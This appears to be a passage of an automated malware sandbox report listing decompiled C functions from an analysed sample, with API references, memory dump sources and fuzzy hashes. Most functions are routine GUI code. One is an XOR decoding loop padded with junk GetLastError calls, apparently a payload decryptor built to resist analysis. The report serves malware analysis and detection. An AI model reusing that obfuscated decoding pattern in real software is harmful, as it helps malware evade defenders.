                                            					_t77 = OffsetRect(_t110, (_v12 - _t110->right - _t110->left - _t100 >> 1) - 1, (_v8 - _t110->bottom - _t110->top - _t100 >> 1) - 1);
                                            					if(_a4 != 1) {
                                            						return _t77;
                                            					}
                                            					return OffsetRect(_t110,  *(_t88 + 0xfc), 0);
                                            				}
                                            				_t79 = _t54 - 1;
                                            				if(_t79 == 0) {
                                            					__eflags = _t100;
                                            					 *(_t109 + 0x1c) = _t91;
                                            					_t80 =  *(_t109 + 0x20);
                                            					if(_t100 == 0) {
                                            						_t82 = _t80 + _t80 * 2 - _t91;
                                            					} else {
                                            						_t82 = _t80 + _t91;
                                            						__eflags = _t82;
                                            					}
                                            					asm("cdq");
                                            					_t83 = _t82 - _t100;
                                            					__eflags = _t83;
                                            					_t84 = _t83 >> 1;
                                            					L9:
                                            					 *(_t109 + 0x18) = _t84;
                                            					goto L12;
                                            				}
                                            				if(_t79 != 1) {
                                            					goto L12;
                                            				}
                                            				if(_t100 == 0) {
                                            					 *(_t109 + 0x1c) = _t91;
                                            					_t84 = ( *(_t109 + 0x20) << 1) -  *(_t109 + 0x24);
                                            				} else {
                                            					_t84 = 1;
                                            					 *(_t109 + 0x1c) = _t84;
                                            				}
                                            				goto L9;
                                            			}

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Rect$Offset
                                            • String ID:
                                            • API String ID: 3858320380-0
                                            • Opcode ID: a8bcfc7a24c1dd58891d067b0bfb63c54d62dd3b19c554575f39b6ca731ca03a
                                            • Instruction ID: 9d4db4d92ebfce67b92012e8cfbb6e150ce2038beb84166a71d0e9c619fd8a43
                                            • Opcode Fuzzy Hash: a8bcfc7a24c1dd58891d067b0bfb63c54d62dd3b19c554575f39b6ca731ca03a
                                            • Instruction Fuzzy Hash: 15418871600A15DFD720CF68D944AAABBF6FB88300F484A2DE886D7655D734F805CBA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 89%
                                            			E0041AE9C(void* __ecx, void* __eflags) {
                                            				struct tagPOINT* _t76;
                                            				long* _t78;
                                            				long* _t81;
                                            				struct tagPOINT* _t82;
                                            				signed int _t84;
                                            				signed int _t85;
                                            				signed int _t86;
                                            				int _t87;
                                            				struct tagPOINT* _t97;
                                            				signed int _t108;
                                            				void* _t123;
                                            				void* _t125;
                                            
                                            				E00406520(E0042A85C, _t125);
                                            				_t123 = __ecx;
                                            				_push(0);
                                            				 *(_t125 - 0x10) =  *(__ecx + 0x40);
                                            				 *(__ecx + 0x40) =  *(_t125 + 8);
                                            				 *(__ecx + 0x44) =  *(_t125 + 0xc);
                                            				 *(__ecx + 0x48) =  *(_t125 + 0x10);
                                            				E0041A41D(_t125 - 0x24, __eflags);
                                            				 *(_t125 - 4) =  *(_t125 - 4) & 0x00000000;
                                            				E00419E91(_t125 - 0x24,  *(__ecx + 0x40));
                                            				_t76 = __ecx + 0x4c;
                                            				_t76->x =  *(__ecx + 0x44);
                                            				_t76->y =  *(__ecx + 0x48);
                                            				LPtoDP( *(_t125 - 0x1c), _t76, 1);
                                            				_t78 =  *(_t125 + 0x14);
                                            				_t97 = __ecx + 0x54;
                                            				_t97->x =  *_t78;
                                            				_t97->y = _t78[1];
                                            				LPtoDP( *(_t125 - 0x1c), _t97, 1);
                                            				_t81 =  *(_t125 + 0x18);
                                            				_t82 = __ecx + 0x5c;
                                            				_t82->x =  *_t81;
                                            				_t82->y = _t81[1];
                                            				LPtoDP( *(_t125 - 0x1c), _t82, 1);
                                            				_t84 =  *(__ecx + 0x50);
                                            				if(_t84 < 0) {
                                            					 *(__ecx + 0x50) =  ~_t84;
                                            				}
                                            				_t85 =  *(_t123 + 0x58);
                                            				if(_t85 < 0) {
                                            					 *(_t123 + 0x58) =  ~_t85;
                                            				}
                                            				_t86 =  *(_t123 + 0x60);
                                            				if(_t86 < 0) {
                                            					 *(_t123 + 0x60) =  ~_t86;
                                            				}
                                            				 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
                                            				_t87 = E0041A48F(_t125 - 0x24);
                                            				_t108 = 0xa;
                                            				if(_t97->x == 0) {
                                            					asm("cdq");
                                            					_t87 =  *(_t123 + 0x4c) / _t108;
                                            					_t97->x = _t87;
                                            				}
                                            				if( *(_t123 + 0x58) == 0) {
                                            					asm("cdq");
                                            					_t87 =  *(_t123 + 0x50) / _t108;
                                            					 *(_t123 + 0x58) = _t87;
                                            				}
                                            				if( *(_t123 + 0x5c) == 0) {
                                            					asm("cdq");
                                            					_t87 = _t97->x / _t108;
                                            					 *(_t123 + 0x5c) = _t87;
                                            				}
                                            				if( *(_t123 + 0x60) == 0) {
                                            					asm("cdq");
                                            					_t87 =  *(_t123 + 0x58) / _t108;
                                            					 *(_t123 + 0x60) = _t87;
                                            				}
                                            				if( *(_t123 + 0x1c) != 0) {
                                            					E0041B2F1(_t123);
                                            					_t87 =  *(_t125 - 0x10);
                                            					if(_t87 !=  *((intOrPtr*)(_t123 + 0x40))) {
                                            						_t87 = InvalidateRect( *(_t123 + 0x1c), 0, 1);
                                            					}
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t125 - 0xc));
                                            				return _t87;
                                            			}

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 0041AEA1
                                              • Part of subcall function 0041A41D: __EH_prolog.LIBCMT ref: 0041A422
                                              • Part of subcall function 0041A41D: GetWindowDC.USER32(?,?,?,0041AED0,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0041A44B
                                              • Part of subcall function 00419E91: SetMapMode.GDI32(?,?), ref: 00419EAA
                                              • Part of subcall function 00419E91: SetMapMode.GDI32(?,?), ref: 00419EB8
                                            • LPtoDP.GDI32(?,?,00000001), ref: 0041AEF9
                                            • LPtoDP.GDI32(?,?,00000001), ref: 0041AF11
                                            • LPtoDP.GDI32(?,?,00000001), ref: 0041AF29
                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0041AFB7
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: H_prologMode$InvalidateRectWindow
                                            • String ID:
                                            • API String ID: 2422810626-0
                                            • Opcode ID: 833de7a5b383fbafa19164f96b33c5ca989ee9024f938b107583b44dd389414c
                                            • Instruction ID: ea718bac83f46552081215f01c1c436204e2ca2be48b4d518ea9ba6a6dc7aab3
                                            • Opcode Fuzzy Hash: 833de7a5b383fbafa19164f96b33c5ca989ee9024f938b107583b44dd389414c
                                            • Instruction Fuzzy Hash: 904104B0601B159FCB20DF6AC880A9AB7F5FF48304F10482EE946D7790D7B5E855CB15
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 86%
                                            			E00401163(intOrPtr _a4, intOrPtr _a8, char* _a12) {
                                            				signed int _v8;
                                            				signed int _v12;
                                            				intOrPtr _v16;
                                            				signed int _v20;
                                            				char _t49;
                                            				intOrPtr _t58;
                                            				intOrPtr _t90;
                                            				intOrPtr _t107;
                                            				void* _t115;
                                            
                                            				_v8 =  *_a12;
                                            				_v12 =  *((intOrPtr*)(_a12 + 1));
                                            				_v16 = 0;
                                            				while(_v16 < _a8) {
                                            					asm("cdq");
                                            					_v8 = ((_v8 & 0x000000ff) + 1) % 0x362;
                                            					asm("cdq");
                                            					_v12 = (0 + (_v12 & 0x000000ff)) % 0x362;
                                            					_t58 =  *0x437cc0; // 0x2071c90
                                            					_t107 =  *0x437cc0; // 0x2071c90
                                            					E0040129C(_v8 & 0x000000ff, _t107 + (_v8 & 0x000000ff), _t58 + (_v12 & 0x000000ff));
                                            					_t115 = _t115 + 8;
                                            					asm("cdq");
                                            					_v20 = 0;
                                            					GetLastError();
                                            					GetLastError();
                                            					GetLastError();
                                            					GetLastError();
                                            					GetLastError();
                                            					GetLastError();
                                            					_t90 =  *0x437cc0; // 0x2071c90
                                            					 *(_a4 + _v16) =  *(_a4 + _v16) ^  *(_t90 + (_v20 & 0x000000ff));
                                            					_v16 = _v16 + 1;
                                            				}
                                            				_t49 = _v8;
                                            				 *_a12 = _t49;
                                            				 *((char*)(_a12 + 1)) = _v12;
                                            				return _t49;
                                            			}

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: ErrorLast
                                            • String ID:
                                            • API String ID: 1452528299-0
                                            • Opcode ID: 2fb4c9c442cb0e0720c7f3357a9b25f75bd02d34cfc46486d38f63fe239aacba
                                            • Instruction ID: 50b4629dd769d307c311c64c04c265a3d6c1846e1b25a8a03c552174e884fb50
                                            • Opcode Fuzzy Hash: 2fb4c9c442cb0e0720c7f3357a9b25f75bd02d34cfc46486d38f63fe239aacba
                                            • Instruction Fuzzy Hash: 3031E535A0928A9FCB05CF58CC917BDBF72BF89300F1880F8D4519B352C535AA51DB54
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 95%
                                            			E00415DE6(void* __ebx, intOrPtr __ecx, void* __eflags) {
                                            				void* _t31;
                                            				signed int _t42;
                                            				struct HWND__* _t62;
                                            				void* _t64;
                                            
                                            				E00406520(E00429E94, _t64);
                                            				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
                                            				E00412F9D(_t64 - 0x38);
                                            				E0041331F(_t64 - 0x74);
                                            				 *(_t64 - 4) = 0;
                                            				_t62 = GetTopWindow( *(__ecx + 0x1c));
                                            				if(_t62 != 0) {
                                            					do {
                                            						 *(_t64 - 0x58) = _t62;
                                            						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
                                            						_push(_t62);
                                            						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x74;
                                            						if(E00413767() == 0 || E00412DF9(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
                                            							if(E00412DF9( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
                                            								_t46 =  *((intOrPtr*)(_t64 + 0xc));
                                            								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
                                            									if((SendMessageA( *(_t64 - 0x58), 0x87, 0, 0) & 0x00000020) == 0) {
                                            										L11:
                                            										_t46 = 0;
                                            									} else {
                                            										_t42 = E00416528(_t64 - 0x74) & 0x0000000f;
                                            										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
                                            											goto L11;
                                            										}
                                            									}
                                            								}
                                            								E00413162(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
                                            							}
                                            						}
                                            						_t62 = GetWindow(_t62, 2);
                                            					} while (_t62 != 0);
                                            				}
                                            				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
                                            				 *(_t64 - 0x58) = 0;
                                            				_t31 = E00413DB2(_t64 - 0x74);
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
                                            				return _t31;
                                            			}

                                            APIs
                                            • __EH_prolog.LIBCMT ref: 00415DEB
                                            • GetTopWindow.USER32(?), ref: 00415E12
                                            • GetDlgCtrlID.USER32 ref: 00415E27
                                            • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 00415E80
                                            • GetWindow.USER32(00000000,00000002), ref: 00415EBB
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$CtrlH_prologMessageSend
                                            • String ID:
                                            • API String ID: 4125289812-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 92%
                                            			E004105C2(intOrPtr __ecx) {
                                            				void* __esi;
                                            				struct HWND__* _t40;
                                            				void* _t42;
                                            				void* _t50;
                                            				intOrPtr _t63;
                                            				signed int _t66;
                                            				void* _t83;
                                            
                                            				_t63 = __ecx;
                                            				E00406520(E0042A8D0, _t83);
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				 *(_t83 - 0x10) =  *(_t83 - 0x10) & 0x00000000;
                                            				 *((intOrPtr*)(_t83 - 0x14)) = __ecx;
                                            				if(( *(__ecx + 0x92) & 0x00000008) == 0) {
                                            					L9:
                                            					E00416B16( *((intOrPtr*)(_t83 + 8)), _t83,  *((intOrPtr*)(_t63 + 0x78)));
                                            				} else {
                                            					_t40 =  *(__ecx + 0x1c);
                                            					if(_t40 == 0) {
                                            						goto L9;
                                            					} else {
                                            						_t66 =  *0x436980; // 0x436994
                                            						 *(_t83 - 0x10) = _t66;
                                            						 *(_t83 - 4) =  *(_t83 - 4) & 0x00000000;
                                            						_t42 = E00413740(_t83, GetParent(_t40));
                                            						if(SendMessageA( *(_t42 + 0x1c), 0x464, 0x104, E00416CC1(_t83 - 0x10, _t83, 0x104)) >= 0) {
                                            							E00416D10(_t83 - 0x10, __eflags, 0xffffffff);
                                            						} else {
                                            							E00416A77(_t83 - 0x10, 0x104);
                                            						}
                                            						if( *((intOrPtr*)( *(_t83 - 0x10) - 8)) == 0) {
                                            							L8:
                                            							 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
                                            							E00416AEC(_t83 - 0x10);
                                            							_t63 =  *((intOrPtr*)(_t83 - 0x14));
                                            							goto L9;
                                            						} else {
                                            							_t50 = E00413740(_t83, GetParent( *( *((intOrPtr*)(_t83 - 0x14)) + 0x1c)));
                                            							if(SendMessageA( *(_t50 + 0x1c), 0x465, 0x104, E00416CC1(_t83 - 0x10, _t83, 0x104)) >= 0) {
                                            								E00416D10(_t83 - 0x10, __eflags, 0xffffffff);
                                            								E00416861( *((intOrPtr*)(_t83 + 8)), _t83 - 0x10);
                                            								 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
                                            								E00416AEC(_t83 - 0x10);
                                            							} else {
                                            								E00416A77(_t83 - 0x10, 0x104);
                                            								goto L8;
                                            							}
                                            						}
                                            					}
                                            				}
                                            				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0xc));
                                            				return  *((intOrPtr*)(_t83 + 8));
                                            			}











                                            APIs
                                            • __EH_prolog.LIBCMT ref: 004105C7
                                            • GetParent.USER32(?), ref: 00410604
                                            • SendMessageA.USER32(?,00000464,00000104,00000000), ref: 0041062C
                                            • GetParent.USER32(?), ref: 00410655
                                            • SendMessageA.USER32(?,00000465,00000104,00000000), ref: 00410672
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MessageParentSend$H_prolog
                                            • String ID:
                                            • API String ID: 1056721960-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 63%
                                            			E004150E7(void* __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
                                            				struct tagRECT _v20;
                                            				int _t21;
                                            				struct HWND__* _t22;
                                            				struct HWND__* _t41;
                                            				void* _t42;
                                            				intOrPtr* _t43;
                                            
                                            				_t42 = __ecx;
                                            				_t21 = IsWindowVisible( *(__ecx + 0x1c));
                                            				if(_t21 != 0 || _a12 != _t21 || _a16 != _t21) {
                                            					_t22 = ScrollWindow( *(_t42 + 0x1c), _a4, _a8, _a12, _a16);
                                            				} else {
                                            					_push(5);
                                            					_push( *(_t42 + 0x1c));
                                            					while(1) {
                                            						_t22 = GetWindow();
                                            						_t41 = _t22;
                                            						if(_t41 == 0) {
                                            							goto L7;
                                            						}
                                            						GetWindowRect(_t41,  &_v20);
                                            						E0041A2F1(_t42,  &_v20);
                                            						SetWindowPos(_t41, 0, _v20.left + _a4, _v20.top + _a8, 0, 0, 0x15);
                                            						_push(2);
                                            						_push(_t41);
                                            					}
                                            				}
                                            				L7:
                                            				_t43 =  *((intOrPtr*)(_t42 + 0x34));
                                            				if(_t43 != 0 && _a12 == 0) {
                                            					return  *((intOrPtr*)( *_t43 + 0x58))(_a4, _a8);
                                            				}
                                            				return _t22;
                                            			}










                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 004150F5
                                            • GetWindow.USER32(?,00000005), ref: 00415114
                                            • GetWindowRect.USER32 ref: 00415121
                                              • Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A305
                                              • Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A30E
                                            • SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 0041514C
                                            • ScrollWindow.USER32 ref: 00415166
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: Window$ClientScreen$RectScrollVisible
                                            • String ID:
                                            • API String ID: 1714389229-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 90%
                                            			E00420B23(intOrPtr* __ecx, void* __ebp, signed int _a4) {
                                            				void* _t21;
                                            				signed char _t22;
                                            				signed int _t40;
                                            				intOrPtr* _t44;
                                            				void* _t45;
                                            				struct HWND__* _t47;
                                            
                                            				_t45 = __ebp;
                                            				_t40 = _a4;
                                            				_t44 = __ecx;
                                            				if(_t40 != 0 && ( *(__ecx + 0x24) & 0x00000004) != 0) {
                                            					E004166CE(__ecx, 0);
                                            					return SetFocus(0);
                                            				}
                                            				_t21 = E00413740(_t45, GetParent( *(_t44 + 0x1c)));
                                            				if(_t21 != 0) {
                                            					return _t21;
                                            				} else {
                                            					if(_t40 != 0) {
                                            						_t22 =  *(_t44 + 0x24);
                                            						_push(_t45);
                                            						if((_t22 & 0x00000080) != 0) {
                                            							 *(_t44 + 0x24) = _t22 & 0x0000007f;
                                            							 *((intOrPtr*)( *_t44 + 0x8c))();
                                            							_t47 =  *(_t44 + 0x1c);
                                            							if(GetActiveWindow() == _t47) {
                                            								SendMessageA(_t47, 6, 1, 0);
                                            							}
                                            						}
                                            						if(( *(_t44 + 0x24) & 0x00000020) != 0) {
                                            							SendMessageA( *(_t44 + 0x1c), 0x86, 1, 0);
                                            						}
                                            					} else {
                                            						if( *((intOrPtr*)(_t44 + 0xa0)) == 0) {
                                            							 *(_t44 + 0x24) =  *(_t44 + 0x24) | 0x00000080;
                                            							 *((intOrPtr*)( *_t44 + 0x88))();
                                            						}
                                            					}
                                            					asm("sbb edi, edi");
                                            					return E00420BD9(_t44, ( ~_t40 & 0xfffffff0) + 0x20);
                                            				}
                                            			}










                                            APIs
                                            • SetFocus.USER32(00000000,00000000), ref: 00420B3F
                                            • GetParent.USER32(?), ref: 00420B4D
                                            • GetActiveWindow.USER32 ref: 00420B99
                                            • SendMessageA.USER32(?,00000006,00000001,00000000), ref: 00420BAA
                                            • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00420BBF
                                              • Part of subcall function 004166CE: EnableWindow.USER32(?,?), ref: 004166DC
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$ActiveEnableFocusParent
                                            • String ID:
                                            • API String ID: 3951091596-0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 65%
                                            			E00420BD9(void* __ecx, signed int _a4) {
                                            				struct HWND__* _t20;
                                            				void* _t23;
                                            				void* _t32;
                                            				void* _t33;
                                            				struct HWND__* _t34;
                                            
                                            				_t33 = __ecx;
                                            				if((E00416528(__ecx) & 0x40000000) == 0) {
                                            					_t32 = E00414DCC(__ecx);
                                            				} else {
                                            					_t32 = __ecx;
                                            				}
                                            				if((_a4 & 0x0000000c) != 0) {
                                            					_t23 = E004166B3(_t32);
                                            					if(( !_a4 & 0x00000008) == 0 || _t23 == 0 || _t32 == _t33) {
                                            						SendMessageA( *(_t32 + 0x1c), 0x86, 0, 0);
                                            					} else {
                                            						 *(_t33 + 0x25) =  *(_t33 + 0x25) | 0x00000002;
                                            						SendMessageA( *(_t32 + 0x1c), 0x86, 1, 0);
                                            						 *(_t33 + 0x25) =  *(_t33 + 0x25) & 0x000000fd;
                                            					}
                                            				}
                                            				_push(5);
                                            				_push(GetDesktopWindow());
                                            				while(1) {
                                            					_t20 = GetWindow();
                                            					_t34 = _t20;
                                            					if(_t34 == 0) {
                                            						break;
                                            					}
                                            					if(E004208E0( *(_t32 + 0x1c), _t34) != 0) {
                                            						SendMessageA(_t34, 0x36d, _a4, 0);
                                            					}
                                            					_push(2);
                                            					_push(_t34);
                                            				}
                                            				return _t20;
                                            			}









                                            APIs
                                              • Part of subcall function 00416528: GetWindowLongA.USER32 ref: 00416534
                                            • SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00420C2F
                                            • SendMessageA.USER32(?,00000086,00000000,00000000), ref: 00420C43
                                            • GetDesktopWindow.USER32 ref: 00420C47
                                            • GetWindow.USER32(00000000), ref: 00420C54
                                            • SendMessageA.USER32(00000000,0000036D,?,00000000), ref: 00420C75
                                            Memory Dump Source
                                            • Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp
                                            • Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp
                                            • Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_1_2_400000_sort.jbxd
                                            Similarity
                                            • API ID: MessageSendWindow$DesktopLong
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0042153C(intOrPtr __ecx, struct HWND__* _a4, unsigned int _a8) {
                                            				intOrPtr _v8;
                                            				char _v268;
                                            				void* __ebp;
                                            				int _t20;
                                            				unsigned int _t39;
                                            				intOrPtr _t45;
                                            
                                            				_v8 = __ecx;
                                            				_t45 =  *((intOrPtr*)(E00424BFB() + 4));
                                            				if(_t45 != 0 && _a8 != 0) {
                                            					_t39 = _a8 >> 0x10;
                                            					if(_t39 != 0) {
                                            						_t20 =  *(_t45 + 0xb0);
                                            						if(_a8 == _t20 && _t39 ==  *(_t45 + 0xb2)) {
                                            							GlobalGetAtomNameA(_t20,  &_v268, 0x103);
                                            							GlobalAddAtomA( &_v268);
                                            							GlobalGetAtomNameA( *(_t45 + 0xb2),  &_v268, 0x103);
                                            							GlobalAddAtomA( &_v268);
                                            							SendMessageA(_a4, 0x3e4,  *(_v8 + 0x1c), ( *(_t45 + 0xb2) & 0x0000ffff) << 0x00000010 |  *(_t45 + 0xb0) & 0x0000ffff);
                                            						}
                                            					}
                                            				}
                                            				return 0;
                                            			}










                                            APIs
                                            • GlobalGetAtomNameA.KERNEL32 ref: 0042159E
                                            • GlobalAddAtomA.KERNEL32 ref: 004215AD
                                            • GlobalGetAtomNameA.KERNEL32 ref: 004215C3
                                            • GlobalAddAtomA.KERNEL32 ref: 004215CC
                                            • SendMessageA.USER32(?,000003E4,?,?), ref: 004215F0
                                            Similarity
                                            • API ID: AtomGlobal$Name$MessageSend
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 89%
                                            			E004142C3() {
                                            				CHAR* _t35;
                                            				WNDCLASSA* _t37;
                                            				void* _t40;
                                            				void* _t42;
                                            
                                            				E00406520(E00429E28, _t40);
                                            				_t37 =  *(_t40 + 8);
                                            				 *((intOrPtr*)(_t40 - 0x10)) = _t42 - 0x30;
                                            				if(GetClassInfoA(_t37->hInstance, _t37->lpszClassName, _t40 - 0x38) != 0) {
                                            					L5:
                                            					_push(1);
                                            					_pop(0);
                                            					L6:
                                            					 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
                                            					return 0;
                                            				}
                                            				if(RegisterClassA(_t37) != 0) {
                                            					if( *((intOrPtr*)(E00424BFB() + 0x14)) != 0) {
                                            						E00425F56(1);
                                            						 *(_t40 - 4) = 0;
                                            						_t9 = E00424BFB() + 0x34; // 0x34
                                            						_t35 = _t9;
                                            						lstrcatA(_t35, _t37->lpszClassName);
                                            						 *(_t40 + 0xa) = 0xa;
                                            						 *((char*)(_t40 + 0xb)) = 0;
                                            						lstrcatA(_t35, _t40 + 0xa);
                                            						 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
                                            						E00425FC6(1);
                                            					}
                                            					goto L5;
                                            				}
                                            				goto L6;
                                            			}








                                            APIs
                                            Similarity
                                            • API ID: Classlstrcat$H_prologInfoRegister
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 59%
                                            			E00427EF7(void* __ecx, char _a8) {
                                            				struct tagPOINT _v12;
                                            				void* __ebp;
                                            				void* _t15;
                                            				void* _t24;
                                            				void* _t26;
                                            				intOrPtr* _t28;
                                            
                                            				_push(__ecx);
                                            				_push(__ecx);
                                            				_t26 = __ecx;
                                            				if(_a8 == 1) {
                                            					GetCursorPos( &_v12);
                                            					ScreenToClient( *(_t26 + 0x1c),  &_v12);
                                            					if( *((intOrPtr*)(_t26 + 0xec)) == 2 || E0042799F(_t26, _t24,  &_v12,  &_a8) == 0) {
                                            						_push(LoadCursorA(0, 0x7f00));
                                            					} else {
                                            						_t28 = _t26 + 0x100;
                                            						if( *_t28 == 0) {
                                            							 *_t28 = LoadCursorA( *(E00424BFB() + 0xc), 0x7902);
                                            						}
                                            						_push( *_t28);
                                            					}
                                            					SetCursor();
                                            					_t15 = 0;
                                            				} else {
                                            					_t15 = E004136A7(__ecx);
                                            				}
                                            				return _t15;
                                            			}










                                            APIs
                                            Similarity
                                            • API ID: Cursor$ClientLoadScreen
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0041031E(void* _a4, void* _a8) {
                                            				void* _v12;
                                            				DEVMODEA* _t9;
                                            				void* _t20;
                                            				struct HDC__* _t22;
                                            				signed short* _t23;
                                            
                                            				if(_a4 == 0) {
                                            					L5:
                                            					return 0;
                                            				}
